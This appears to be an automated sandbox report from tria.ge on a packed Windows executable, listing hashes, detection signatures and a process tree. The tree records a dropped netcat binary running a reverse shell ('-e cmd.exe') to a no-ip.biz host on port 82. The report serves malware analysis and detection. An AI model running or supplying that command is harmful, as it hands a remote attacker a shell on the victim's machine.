Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    141s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/07/2024, 08:45

General

  • Target

    5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe

  • Size

    1.3MB

  • MD5

    5fce41613d2bb16e353e5546106568a0

  • SHA1

    f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02

  • SHA256

    4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b

  • SHA512

    ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7

  • SSDEEP

    24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\nc1.exe
        nc1 -d -e cmd.exe subprog.no-ip.biz 82
        3⤵
        • Executes dropped EXE
        PID:1188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\moi.bat

    Filesize

    55B

    MD5

    b10865d09b79c801d0ed79c38e1148b2

    SHA1

    927d484b37376dcb0a8223f89f06923664f75d3d

    SHA256

    7478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8

    SHA512

    89c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768

  • C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\nc1.exe

    Filesize

    1.1MB

    MD5

    a5923f2e7efaf747844e530baa7fe32a

    SHA1

    285559a6bf798ce6e9a49a1db2795d89e12675a7

    SHA256

    9dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30

    SHA512

    fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e

  • memory/1188-15-0x0000000002200000-0x00000000022E4000-memory.dmp

    Filesize

    912KB

  • memory/1188-14-0x00000000007C0000-0x00000000007C1000-memory.dmp

    Filesize

    4KB

  • memory/2724-0-0x0000000000400000-0x000000000057B000-memory.dmp

    Filesize

    1.5MB

  • memory/2724-16-0x0000000000400000-0x000000000057B000-memory.dmp

    Filesize

    1.5MB